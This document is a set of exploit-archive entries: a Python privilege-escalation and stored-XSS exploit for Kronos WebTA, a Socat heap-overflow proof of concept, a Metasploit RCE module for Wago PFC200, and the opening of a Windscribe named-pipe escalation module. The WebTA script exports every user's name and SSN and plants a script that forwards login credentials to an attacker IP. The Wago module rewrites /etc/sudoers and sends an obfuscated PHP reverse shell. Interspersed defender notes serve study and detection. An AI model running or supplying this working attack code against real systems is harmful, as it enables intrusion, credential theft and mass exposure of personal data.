
Kronos WebTA 4.0 Privilege Escalation / Cross Site Scripting


Kronos WebTA version 4.0 suffers from cross site scripting and authenticated remote privilege escalation vulnerabilities.


MD5 | 3aa449c5ad121978ed635e81dfbb060e

#  Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
# Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Discovery date: 2019-09-20
# Vendor Homepage: https://www.kronos.com/products/kronos-webta
# Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
# Tested on: Linux
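# CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493
# NOTE: the banner string printed by the script below cites CVE-2020-8494 for the
# privilege escalation instead. The two identifiers disagree, so confirm against
# the CVE record before referencing either in tickets or detection content.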
# Usage: python3 exploit.py http://target

#!/bin/bash/python3

###
# *Exploit requires credentials with Timekeeper or Supervisor privileges
#
# Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate"
# servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an
# admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself.
#
# selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN>
#
# With our new admin account, we can abuse a stored XSS vulnerability present in the login page,
# banner (displayed on every page) & password reset page. We can also pull system information and
# download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands).
#
#
# Below is an example of the exploit output:
#####
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper
#
# [+] Available Admin Accounts:
# MOTOKO
# BATOU
# TOGUSA
# ISHIKAWA
#
# [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'...
#
# [+] 'TESTER' successfully elevated to Admin privs :)
#
#
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin
#
# [+] Webta Version Information
# Site parameter: company
# Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA
# webTA Servlet Version: 3.8.6.79029
# webTA Database Version: 3.8.6.79029
# App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64)
# App Server JDK Version: Oracle Corporation version 1.8.0_222
# App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0)
# App Server JDBC Driver: Oracle JDBC driver version 11.2.0.4.0
# Database Version: Oracle JDBC driver version 11.2.0.4.0
# Database Connection: jdbc:oracle:thin:@//foo.rds.amazonaws.com:1521/webtadb<br>connected as user WEBTASVC
#
# [-] Downloading names and SSNs...
#
# [+] Complete. 5020 users written to file 'WebTA-PII.xls'
# [+] Sample Content:
# USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status,
# MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active,
#
# [+] Stored XSS attack complete :)
#####

import re
from requests import Request, Session
from sys import argv, exit




banner = """###
# Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit
# Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Discovery date: 20 SEPT 2019
# Vendor Homepage: https://www.kronos.com/products/kronos-webta
# Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
# Tested on: Linux
# CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493
# Usage: python3 exploit.py http://target
###"""
base_url = argv[1]
username = "TESTER"
password = "password!1234"
# set to True if you want to also exploit Stored XSS
xss = False
# xss strings can be injected into 3 different 'banner' locations (feel free to modify content)
# WILL NOT ERASE CONTENT ALREADY IN APPLICATION
xss_login_page = """
<script>
/* steals login creds each time a user logs in and forwards them to attacker ip */

var attacker = "192.168.1.3";

/* don't forget to set up a listener (python3 -m http.server 80) */
function stealCreds() {
var username = document.frm[1].value;
var password = document.frm[2].value;
img = new Image();
img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password);
setTimeout('document.frm.submit();', 1000);
return false;
}

function readyToSteal() {
document.frm.onsubmit = stealCreds;
}

/* special for WebTA because otherwise the script loads before the DOM and password form */
document.addEventListener("DOMContentLoaded", readyToSteal);
</script>
"""
xss_banner_everypage = ""
xss_passwordchange_page = ""
s = Session()
adm_list = []



def web_req(url, data):
print()
req = Request('POST', url, data=data)
prepared = s.prepare_request(req)
resp = s.send(prepared, allow_redirects=True, verify=False)
return resp



def killActiveSession():
url = base_url + "/servlet/com.threeis.webta.H111multipleLogin"
data = {"selFunc":"continue"}
resp = web_req(url, data)



def checkPrivs():
url = base_url + "/servlet/com.threeis.webta.HGateway"
data = {}
resp = web_req(url, data)
html = resp.text
activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html)
roles = re.findall(r'(.*?)type\="button"(.*?)>', html)
if activeSession:
print("[-] Killing active session...")
killActiveSession()
login()
elif roles:
roles_list = []
for role in roles:
role = role[1].split('"')[1]
roles_list.append(role)
print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list)))

else:
print("[!] Account does not have required Timekeeper or Supervisor privs")
exit()



def login():
url = base_url + "/servlet/com.threeis.webta.H110login"
data = {"j_username": username, "j_password": password, "login": "++Log+In++"}
resp = web_req(url, data)
if resp.status_code != 200:
print("[!] Failed login in as '{}'".format(username))
exit()
checkPrivs()



def findAdmins():
url = base_url + "/servlet/com.threeis.webta.H940searchUser"
data = {
"selFunc":"search",
"return_page":"com.threeis.webta.P491delegate",
"return_variable":"delegate",
"search_org":"0",
"search_role":"Administrator",
"actingRole":"2",
"payload_name_0":"selFunc",
"payload_val_0":"search",
"payload_name_1":"selRow",
"payload_name_2":"delegate",
"payload_name_3":"delegateRole",
"payload_val_3":"2",
"payload_name_4":"delegatorEmpId",
"payload_val_4":"15667", # might need a valid user id
"payload_name_5":"delegatorUserId",
"payload_val_5":username,
}
resp = web_req(url, data)
html = resp.text
adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html)
print("[+] Available Admin Accounts:")
for snip in adm_usrs:
adm = snip.split('</TD><TD CLASS="bckGray">')[2]
adm_list.append(adm)
print(adm)



# Sends the delegation request described in the header comment: it asks the
# H491delegate servlet to add role 5 (admin, per the header) for `username`,
# naming the first account collected by findAdmins() as the delegator.
#
# Defender notes:
# - Root cause as shown here: the delegator identity ("delegatorUserId") comes
#   from the request body, not from the authenticated session. The durable fix
#   is server-side: derive the delegator from the session and check that it is
#   allowed to grant the requested role.
# - Detection: POSTs to this servlet whose delegatorUserId differs from the
#   logged-in user, or that carry delegateRole=5 from a session without Admin.
def privesc():
url = base_url + "/servlet/com.threeis.webta.H491delegate"
data = {
"selFunc":"add",
"delegate":username,
"delegateRole":"5",
"delegatorEmpId":"1234",
"delegatorUserId":adm_list[0],
}
print()
print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username))
resp = web_req(url, data)
# NOTE(review): the response is never inspected, so the success line below is
# printed whether or not the server accepted the request. The role list printed
# by the following login() call is the only real confirmation.
print("[+] '{}' successfully elevated to Admin privs :)".format(username))



# Reads the three administrator-editable messages from the configuration menu,
# then saves them back with the module-level xss_* strings appended.
#
# Defender notes:
# - The fields involved are loginMessage, bannerMessage and passwordMessage.
#   According to the header comment they are rendered on the login page, the
#   banner shown on every page and the password reset page, so markup stored
#   in them runs in every visitor's browser.
# - Mitigation: HTML-encode or sanitize these fields on output, and consider a
#   Content-Security-Policy that blocks inline script.
# - Incident response: after a suspected compromise, review the stored values
#   of these three messages for unexpected <script> content. Because this code
#   appends to the existing text, the visible banner may look unchanged.
def storeXSS():
url = base_url + "/servlet/com.threeis.webta.H261configMenu"
data = {'selFunc':'messages'}
# Existing messages are fetched first so the new content can be appended to them.
resp = web_req(url, data)
html = resp.text
messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL)
messages_clean = []
for message in messages:
message = message.split('wrap="virtual">')[1]
messages_clean.append(message)
# Assumes the page lists the textareas in the order login, banner, password
# change; TODO confirm against the application.
login_page = messages_clean[0]
banner_everypage = messages_clean[1]
passwordchange_page = messages_clean[2]

# Save the messages back with the xss_* strings appended.
url = base_url + "/servlet/com.threeis.webta.H201config"
data = {
"selFunc":"save",
"loginMessage": login_page + xss_login_page,
"bannerMessage": banner_everypage + xss_banner_everypage,
"passwordMessage": passwordchange_page + xss_passwordchange_page,
}
resp = web_req(url, data)
# NOTE(review): printed unconditionally; the save response is not checked.
print("[+] Stored XSS attack complete :)")



# Requests the user-role report export and writes the response body to
# 'WebTA-PII.xls', then prints a row count and the first two lines.
#
# Defender notes:
# - Per the sample output in the header, this single export returns full names
#   and SSNs for every user. Log and alert on selFunc=downloademp requests to
#   this servlet, especially from accounts that only recently gained Admin.
# - Consider whether the export needs to contain unmasked SSNs at all.
def stealPII():
url = base_url + "/servlet/com.threeis.webta.H287userRoleReport"
data = {
"selFunc":"downloademp",
"roletype":"1",
"orgsel":"0",
"pageNum":"1",
}
print("[-] Downloading names and SSNs...")
resp = web_req(url, data)
filename = "WebTA-PII.xls"
# The body is written as-is; the HTTP status is not checked first.
with open(filename, 'wb') as f:
f.write(resp.content)
with open(filename) as f:
for i, l in enumerate(f):
pass
# i is the zero-based index of the last line, which equals the number of rows after the header
count = i # does not include header
print("[+] Complete. {} users written to file '{}'".format(count, filename))
print("[+] Sample Content:")
with open(filename) as f:
# The file is tab-separated despite the .xls name; print the header and first row as CSV.
for n in range(2):
print(",".join(f.readline().split("\t")), end="")



def dumpSysInfo():
url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
data = {"selFunc":"about"}
resp = web_req(url, data)
html = resp.text
data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
print("[+] " + data[0])



if __name__ == '__main__':
print(banner)
login()
findAdmins()
privesc()
login() # login again because we need the refreshed perms after privesc
dumpSysInfo()
#stealPII()
if xss:
storeXSS()
s.close()


Socat 1.7.3.4 Heap Overflow


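Socat version 1.7.3.4 heap-based overflow proof of concept exploit. The overflow is reached through the -b (buffer size) command-line option, so it matters mainly where untrusted input can influence the arguments socat is started with.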


MD5 | 62c72cfd95355e04f3ccb057807bcdab

# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
# Date: 2020-02-03
# Exploit Author: hieubl from HPT Cyber Security
# Vendor Homepage: http://www.dest-unreach.org/
# Software Link: http://www.dest-unreach.org/socat/
# Version: 1.7.3.4
# Tested on: Ubuntu 16.04.6 LTS
# CVE :

# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)

------- [***Description***] -------
The source code of socat.c contains _socat() function which has the
Integer Overflow vulnerability:
int _socat(void) {
...
unsigned char *buff;
...
buff = Malloc(2*socat_opts.bufsiz+1)
...
}

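After that, the line of code "if ((bytes2 = xiotransfer(sock2,
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
xiotransfer() function. The xiotransfer() function calls the xioread()
function. Finally, the xioread() function calls the Read() function.
Note that the transfer is still bounded by the original
socat_opts.bufsiz, not by the size that was actually allocated.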

ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {

...
Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to
Heap-Based Overflow vulnerability***!!!]
...
}

In addition, the "Makefile" does not turn on the Position
Independent Executable (PIE) mitigation (the CFLAGS do not contain the
"-pie" flag). By default, Ubuntu 16.04 does not turn on this
mitigation. Without PIE the main executable is loaded at a fixed
address, so ASLR does not randomize it. Consequently, the program is
easier to exploit, and the bug may even lead to Remote Code Execution
(RCE). The proof of concept below demonstrates only a crash.
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
Desktop application slack executable does not use pie / no ASLR

------- [***Download and build***] -------
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
$ tar xzvf socat-1.7.3.4.tar.gz
$ cd socat-1.7.3.4/
$ ./configure
Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
debugging purpose)
$ make
$ sudo make install

------- [***Proof of Concept***] -------
$ checksec socat
[*] '/home/natsu/temp/socat-1.7.3.4/socat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
>>> There is no PIE mitigation!

$ python -c 'print "A"*1000000'> a
$ touch b
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000

This proof of concept triggers the bug by setting the buffer size to
0x8000000000000050 (9223372036854775888 in decimal). Therefore, the malloc
size passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0,
which wraps around at 64 bits and is equivalent to Malloc(0xa0)
(counting the "+1", the exact values are 0x100000000000000a1 and 0xa1).
The readbytes option ("readbytes=1000000") controls the size of the read
(we cannot read with a size as large as 0x8000000000000050) through these
lines of code:

if (pipe->readbytes) {
    if (pipe->actbytes == 0) {
        return 0;
    }
    if (pipe->actbytes < bufsiz) {
        bufsiz = pipe->actbytes;
    }
}

The missing piece is an overflow check on the buffer size before
2*bufsiz+1 is computed and passed to the allocator.

------- [***Crash logs***] -------
*** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
socat[0x407e3f]
socat[0x4084c6]
socat[0x408f7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
socat[0x4057a9]
======= Memory map: ========
00400000-0044a000 r-xp 00000000 08:01 655643
/usr/local/bin/socat
00649000-0064a000 r--p 00049000 08:01 655643
/usr/local/bin/socat
0064a000-0064b000 rw-p 0004a000 08:01 655643
/usr/local/bin/socat
0064b000-0068c000 rw-p 00000000 00:00 0
01069000-0108a000 rw-p 00000000 00:00 0
[heap]
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0
[stack]
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0
[vvar]
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0
[vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
[vsyscall]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6

Wago PFC200 Remote Code Execution


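This Metasploit module exploits an authenticated remote code execution vulnerability in Wago PFC200. The module needs the web administrator password and defaults to the factory value, so changing that password and limiting network access to the web-based management interface are the immediate mitigations.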


MD5 | 30d621ff752ca81c7d6aafe895b3102e

# Exploit Title: Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
# Date: 2020-02-05
# Exploit Author: Nico Jansen (0x483d)
# Vendor Homepage: https://www.wago.com/
# Version: <= Firmware 11 (02_08_35)
# Tested on: Linux
# CVE : N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'

class MetasploitModule < Msf::Exploit::Remote
#Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Wago PFC200 authenticated remote code execution',
'Description' => %q{
The Wago PFC200 (up to incl. Firmware 11 02_08_35) is vulnerable to an authenticated remote code execution in the
administrative web interface. By exploiting the vulnerability, an attacker is able to run system commands in root context.
To execute this module, login credenials of the website administrator are required (default: admin/wago).
This module was tested against a Wago 750-8202 Firmware 11 (02_08_35) but other PFC200 models may be affected as well.
},
'Author' =>
[
'Nico Jansen (0x483d)' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'References' =>
[
['CVE', '-'],
['US-CERT-VU', '-'],
['URL', '-'],
['URL', '-']
],
'DisclosureDate' => 'Aug 1 2018',
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'SSL' => true,
},
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(443),
OptString.new('ADMINPASSWORD', [true, 'Password to authenticate as admin', 'wago']),
])

deregister_options('VHOST')
end

# Fingerprints the target: fetches /wbm/index.php, looks for the WAGO web-based
# management marker, then asks the config-tool endpoint for the device type
# label and the firmware revision.
#
# Returns CheckCode::Vulnerable when the type label contains "PFC200" and the
# number taken from between the parentheses of the firmware string is <= 11;
# CheckCode::Safe in every other case.
#
# NOTE(review): `exploit` calls this before `login`, so both config-tool
# queries go out with an empty CSRF token and no session cookie. The check can
# only succeed if the device answers them unauthenticated; confirm on a test
# device. If so, model and firmware revision are exposed before authentication,
# which is worth knowing when deciding how far to restrict access to /wbm/.
# NOTE(review): sendConfigToolMessage can return false, in which case the
# `split` calls below raise NoMethodError instead of returning Safe.
def check
@csrf=""
res = send_request_cgi(
'method' => 'GET',
'uri' => '/wbm/index.php'
)

if res && res.code == 200 && res.body.to_s =~ /WAGO Ethernet Web-based Management/
result = sendConfigToolMessage("get_typelabel_value", ["SYSDESC"])
if result and result =~ /PFC200/
# Get the firmware revision and keep only the text between "(" and ")"
result = sendConfigToolMessage("get_coupler_details", ["firmware-revision"])
result = result.split('(')[1]
result = result.split(')')[0]
if Integer(result) <= 11
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe
end

# This function authenticates the adminuser against the Wago PLC
def login
res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/login.php',
'data' => '{"username":"admin","password":"' + datastore['ADMINPASSWORD'] + '"}'
)
if res.code != 200
return false
end

parsed_json = JSON.parse(res.body.to_s)
if parsed_json["status"] == 0
@cookie = res.get_cookies
@csrf = parsed_json["csrfToken"]
return true
else
return false
end
end

# Builds a config-tool request by hand and POSTs it to /wbm/configtools.php
# with the stored session cookie and CSRF token.
#
# scriptname     - value placed in the request's "name" field
# parameters     - array of strings placed in the "parameter" array
# expectResponse - when false, returns true right after sending
#
# Returns the "resultString" of the first device response when its status is
# 0, false otherwise. @csrf is refreshed from every parsed response.
#
# Defender notes:
# - The request names the tool to run and sets "sudo":true. The callers in this
#   module pass names that start with "/../../../", so the server evidently
#   does not confine "name" to its own tool directory (presumably a fixed
#   config-tools path; not visible here).
# - Detection: POSTs to /wbm/configtools.php whose "name" contains "../" or an
#   absolute path.
# - Mitigation: validate the tool name against an allow-list on the server, and
#   keep the management interface off untrusted networks.
#
# NOTE(review): values are concatenated into the JSON without escaping, and a
# nil `res` (timeout) raises NoMethodError at `res.body`.
def sendConfigToolMessage(scriptname, parameters, expectResponse=true)
parameterString = ''
for param in parameters
parameterString = parameterString + '"' + param + '", '
end

# Drop the trailing ", " left by the loop
parameterString = parameterString[0...-2]
request ='{"csrfToken":"' + @csrf + '",'\
'"renewSession":true,"aDeviceParams":{"0"'\
':{"name":"' + scriptname + '","parameter":['\
+ parameterString + '],"sudo":true,"multiline":false,'\
'"timeout":12000,"dataId":0}}}'

res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/configtools.php',
'data' => request,
'cookie' => @cookie,
)
# After exploitation, there is no response, so just return true because the message was sent
if expectResponse == false
return true
end

parsed_json = JSON.parse(res.body.to_s)
@csrf = parsed_json["csrfToken"]
if parsed_json["aDeviceResponse"][0]["status"] == 0
return parsed_json["aDeviceResponse"][0]["resultString"]
else
return false
end
end

# Uses the config-tool request to run sed in place on /etc/sudoers, rewriting
# "NOPASSWD:" to "NOPASSWD:ALL#". Returns whatever sendConfigToolMessage returns.
#
# Defender notes:
# - This is a persistent change to a security-critical file. File-integrity
#   monitoring on /etc/sudoers, or a comparison against the firmware's shipped
#   copy, will show it.
# - The reverse substitution is part of the payload string in send_payload. If
#   the payload never runs, the device is left with the widened sudoers rule,
#   so check the file on any device where an attempt is suspected.
def change_sudo_permissions()
return sendConfigToolMessage('/../../../usr/bin/sed',["-i", "s/NOPASSWD:/NOPASSWD:ALL#/", "/etc/sudoers"])
end

# Encode a given string to bypass validation
def encode(content)
result = ""
content.split("").each do |i|
result = result + "chr(" + (i.ord).to_s + ")."
end
result = result[0...-1]
return result
end

# This function generates the required payload used to connect to the msf listener
def send_payload()
meterpreter_reverse_php='exec("/usr/bin/sed -i \'s/NOPASSWD:ALL#/NOPASSWD:/\' \'/etc/sudoers\'"); $ip = "' + datastore['LHOST'] + '"; $port = ' + datastore['LPORT'].to_s + '; '\
'if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); '\
'$s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port);'\
' $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) '\
'{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) '\
'{ die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } '\
'if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; '\
'case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);'\
' $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= '\
'fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } '\
'$GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") '\
'&& ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } '\
'else { eval($b); } die(); ?>'

command = "eval(" + encode(meterpreter_reverse_php) + ");"
return sendConfigToolMessage("/../../../usr/bin/php5", ["-r", command], false)
end

def exploit
if check == Exploit::CheckCode::Vulnerable # Check if the system may be a PFC200
print_good("Target seems to be a vulnerable PFC200 device")
if login # Try to authenticate using the given credentials
print_good("Successfully logged in as website admin")
if change_sudo_permissions()
print_good("Manipulated the /etc/sudoers file to enable php execution as root")
print_good("Preparing meterpreter payload and undoing changes to /etc/sudoers...")
send_payload()
else
print_error("Unable to modify the /etc/sudoers file...")
end
else
print_error("Unable to login as admin with the given credentials...")
end
else
print_error("Target is not a valid PFC200 device. Will exit now...")
end
end
end

Windscribe WindscribeService Named Pipe Privilege Escalation


The Windscribe VPN client application for Windows makes use of a Windows service WindscribeService.exe which exposes a named pipe \\.\pipe\WindscribeService allowing execution of programs with elevated privileges. Windscribe versions prior to 1.82 do not validate user-supplied program names, allowing execution of arbitrary commands as SYSTEM. This Metasploit module has been tested successfully on Windscribe versions 1.80 and 1.81 on Windows 7 SP1 (x64).


MD5 | cd70d8abe7ef8543a1dba71630a3f379

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::Services
include Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
'Description' => %q{
The Windscribe VPN client application for Windows makes use of a
Windows service `WindscribeService.exe` which exposes a named pipe
`\\.\pipe\WindscribeService` allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.

This module has been tested successfully on Windscribe versions
1.80 and 1.81 on Windows 7 SP1 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Emin Ghuliev', # Discovery and exploit
'bcoles' # Metasploit
],
'References' =>
[
['CVE', '2018-11479'],
['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
['URL', 'https://pastebin.com/eLG3dpYK']
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2018-05-24',
'DefaultOptions' =>
{
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
},
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0))
register_advanced_options [
OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
]
end

def base_dir
datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
end

def service_exists?(service)
srv_info = service_info(service)

if srv_info.nil?
vprint_warning 'Unable to enumerate Windows services'
return false
end

if srv_info && srv_info[:display].empty?
return false
end

true
end

def write_named_pipe(pipe, command)
kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
